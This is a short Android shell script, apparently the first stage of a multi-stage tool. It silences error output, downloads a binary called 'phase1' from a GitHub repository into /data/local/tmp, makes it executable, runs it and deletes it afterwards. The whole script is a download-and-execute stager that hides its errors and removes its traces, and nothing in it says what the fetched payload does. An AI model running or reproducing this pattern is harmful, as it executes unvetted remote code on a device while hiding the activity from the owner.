#!/bin/sh
exec 2> /dev/zero
wget -O /data/local/tmp/phase1 https://github.com/Androidmate/orion/raw/master/phases/phase1
chmod +x /data/local/tmp/phase1
/data/local/tmp/phase1
rm /data/local/tmp/phase1
